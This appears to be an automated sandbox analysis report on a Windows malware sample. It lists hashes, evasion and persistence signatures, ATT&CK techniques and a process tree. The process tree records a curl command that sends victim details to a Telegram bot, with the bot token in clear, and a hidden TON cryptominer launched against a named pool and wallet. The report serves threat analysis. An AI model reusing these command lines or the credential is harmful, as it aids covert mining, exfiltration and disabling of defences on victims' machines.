Analysis

  • max time kernel
    4264954s
  • max time network
    9s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    17-01-2022 15:54

General

  • Target

    acabd1f99b9e449d951dea975e1f1ad5.exe

  • Size

    1.0MB

  • MD5

    acabd1f99b9e449d951dea975e1f1ad5

  • SHA1

    ef545ca153737d6246be2cd3de1b26fb92241327

  • SHA256

    63e38dc331cd8b202d9109dd5b0e08162673c0661344a06252811d066548c31b

  • SHA512

    e92d6a0f11d2d96267682eed231e8f5580e32df705bc6c0eeb0b6f7fbbe7c56c67267c8e1994c55bb724343e904137808e1fc9636750d2730aa42b3bf217abd1

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings (3 TTPs)
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)
  • Downloads MZ/PE file
  • UPX packed file (1 IoC)
    Detects executables packed with UPX/modified UPX open source packer.
  • Checks BIOS information in registry (2 TTPs, 2 IoCs)
    BIOS information is often read in order to detect sandboxing environments.
  • Themida packer (3 IoCs)
    Detects Themida, an advanced Windows software protection system.
  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Checks whether UAC is enabled (1 TTP, 1 IoC)
  • Suspicious use of SetThreadContext (2 IoCs)
  • Suspicious use of WriteProcessMemory (28 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\acabd1f99b9e449d951dea975e1f1ad5.exe
    "C:\Users\Admin\AppData\Local\Temp\acabd1f99b9e449d951dea975e1f1ad5.exe"
    1⤵
    • Checks BIOS information in registry
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2476
    • C:\Windows\SYSTEM32\curl.exe
      curl "https://api.telegram.org/bot5085421438:AAHmPt5uQhWzP79_WEIMYB3Sq6kZ9Hu2cNo/sendMessage?chat_id=-1001672031538&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0AWorker Tag: None%0A(Windows Defender has been turned off)"
      2⤵
      PID:3692
    • C:\Windows\bfsvc.exe
      C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQBUrKc4jK39eXKGOmJfeEZjVLiZ9aSuxI-G7GPl6_9e9Bwj
      2⤵
      PID:2560
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"
      2⤵
      PID:4088

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

  • Modify Existing Service (T1031): 1
  • Registry Run Keys / Startup Folder (T1060): 1

Defense Evasion

  • Modify Registry (T1112): 2
  • Disabling Security Tools (T1089): 1
  • Virtualization/Sandbox Evasion (T1497): 1

Discovery

  • Query Registry (T1012): 2
  • Virtualization/Sandbox Evasion (T1497): 1
  • System Information Discovery (T1082): 2


Downloads

  • memory/2476-131-0x00007FF74CB90000-0x00007FF74CF5C000-memory.dmp
    Filesize: 3.8MB
  • memory/2476-132-0x00007FF74CB90000-0x00007FF74CF5C000-memory.dmp
    Filesize: 3.8MB
  • memory/2476-133-0x00007FF74CB90000-0x00007FF74CF5C000-memory.dmp
    Filesize: 3.8MB
  • memory/2560-136-0x00000001427491D0-mapping.dmp
  • memory/2560-135-0x0000000140000000-0x000000014274C000-memory.dmp
    Filesize: 39.3MB
  • memory/3692-134-0x0000000000000000-mapping.dmp
  • memory/4088-137-0x0000000140000000-0x000000014002A000-memory.dmp
    Filesize: 168KB
  • memory/4088-138-0x0000000140001E00-mapping.dmp